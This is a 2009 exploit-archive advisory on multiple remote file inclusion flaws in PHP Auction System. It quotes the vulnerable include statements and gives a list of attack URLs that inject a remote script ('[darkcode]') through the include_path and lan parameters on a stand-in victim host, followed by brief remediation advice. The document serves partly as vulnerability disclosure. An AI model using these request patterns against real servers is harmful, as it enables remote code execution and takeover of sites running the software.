[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHPAuctionSystem Multiple Remote File Inclusion Vulnerabilities
# Published : 2009-01-06
# Author : darkmasking
# Previous Title : QuoteBook (poll.inc) Remote Config File Disclosure Vulnerability
# Next Title : RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit


[??]=======================================================================================================[_][-][X]
[??]                                                                             				[??]
[??]      		   PHPAuctionSystem Multiple Remote File Inclusion Vulnerability    			[??]
[??]              				         							[??]
[??]            		 	=======    ------d-------m------     ====    ====   				[??]
[??]             	 	||     =        | |(o o)| |          ||   ||   ||   				[??]
[??]             		||     =          ||(~)||            ||        ||   				[??]
[??]             	 	=======             /|              ||        ||  				[??]
[??]=============================================================================================================[??]
[??] 				Author         	: ~darkmasking~		 					[??]
[??] 				Date           	: January, 6th 2009           					[??]
[??] 				Web           	: https://www.idsafeshield.com					[??]
[??]           		 	Contact        	: support[at]idsafeshield[dot]com  				[??]
[??]					Critical Level 	: Dangerous			  			[??]
[??]-------------------------------------------------------------------------------------------------------------[??]
[??]              		       Affected software description :        					[??]
[??]   				Software 	: PHP Auction System						[??]
[??]          			Vendor		: http://www.phpauctions.info/					[??]
[??]            			Price 	      	: $59.99							[??]
[??]=============================================================================================================[??]
[??]														[??]
[??]	[~] Vulnerable file											[??]
[??]														[??]
[??]		[+] all file below is affected by "include_path" parameter					[??]
[??]														[??]
[??]		./includes/settings.inc.php									[??]
[??]		$password_file = $include_path."passwd.inc.php";						[??]
[??]		include($password_file);									[??]
[??]		include $include_path."fonts.inc.php";								[??]
[??]		include $include_path."fontsize.inc.php";							[??]
[??]		include($include_path."currency.inc.php");							[??]
[??]		include($include_path."errors.inc.php");							[??]
[??]		include($include_path."https.inc.php");								[??]
[??]														[??]
[??]		./includes/auction_confirmation.inc.php								[??]
[??]		require("./includes/messages.inc.php");								[??]
[??]														[??]
[??]		./includes/converter.inc.php									[??]
[??]		include($include_path."nusoap.php");								[??]
[??]														[??]
[??]		./includes/messages.inc.php									[??]
[??]		require($include_path.'messages.'.$language.'.inc.php');					[??]
[??]														[??]
[??]		./includes/stats.inc.php									[??]
[??]		include $prefix."includes/useragent.inc.php";							[??]
[??]		include $prefix."includes/domains.inc.php";							[??]
[??]														[??]
[??]		./includes/useragent.inc.php									[??]
[??]		include $prefix."includes/browsers.inc.php";							[??]
[??]		include $prefix."includes/platforms.inc.php";							[??]
[??]														[??]
[??]		./includes/user_confirmation.inc.php								[??]
[??]		require("./includes/messages.inc.php");								[??]
[??]														[??]
[??]														[??]
[??]		[+] All file below is affected by "lan" parameter						[??]
[??]														[??]
[??]		./browse.php											[??]
[??]		./search.php											[??]
[??]		if(!empty($_GET['lan'])) {									[??]
[??]			$language = $lan;									[??]
[??]			$_SESSION['language'] = $language;							[??]
[??]														[??]
[??]		#// Set language cookie										[??]
[??]			setcookie("USERLANGUAGE",$lan,time()+31536000,"/");					[??]
[??]		} elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) {			[??]
[??]			$language = $SETTINGS['defaultlanguage'];						[??]
[??]			$_SESSION['language'] = $language;							[??]
[??]														[??]
[??]		#// Set language cookie										[??]
[??]			setcookie("USERLANGUAGE",$language,time()+31536000);					[??]
[??]		} elseif(isset($_COOKIE['USERLANGUAGE'])) {							[??]
[??]			$language = $_COOKIE['USERLANGUAGE'];							[??]
[??]		}												[??]
[??]														[??]
[??]		require($include_path.'messages.'.$language.'.inc.php');					[??]
[??]														[??]
[??]-------------------------------------------------------------------------------------------------------------[??]
[??]														[??]
[??]	[~] Exploit												[??]
[??]														[??]
[??]	[+] "include_path" parameter										[??]
[??]														[??]
[??]	http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode]			[??]
[??]	http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode]		[??]
[??]	http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode]			[??]
[??]	http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode]			[??]
[??]	http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode]			[??]
[??]	http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode]			[??]
[??]	http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode]		[??]
[??]														[??]
[??]														[??]
[??]	[+] "lan" parameter											[??]
[??]														[??]
[??]	http://www.darkvictims.com/[path]/browse.php?lan=[darkcode]						[??]
[??]	http://www.darkvictims.com/[path]/search.php?lan=[darkcode]						[??]
[??]														[??]
[??]-------------------------------------------------------------------------------------------------------------[??]
[??]														[??]
[??] 	[~] How to fix this vulnerability									[??]
[??]														[??]
[??]    	Edit the source code to ensure that input is properly validated. Where is possible, 			[??]
[??]    	it is recommended to make a list of accepted filenames and restrict the input to that list.		[??]
[??]														[??]
[??]    	For PHP, the option allow_url_fopen would normally allow a programmer to open, 				[??]
[??]    	include or otherwise use a remote file using a URL rather than a local file path. 			[??]
[??]    	It is recommended to disable this option from php.ini.							[??]
[??]														[??]
[??]-------------------------------------------------------------------------------------------------------------[??]
[??]														[??]
[??]	[~] Greetz												[??]
[??]														[??]
[??]	BUAT DIRI SENDIRI AJA [ Sorry Bro belum dapat teman :) ]						[??]
[??]														[??]
[??]														[??]
[??]=============================================================================================================[??]

# www.Syue.com [2009-01-06]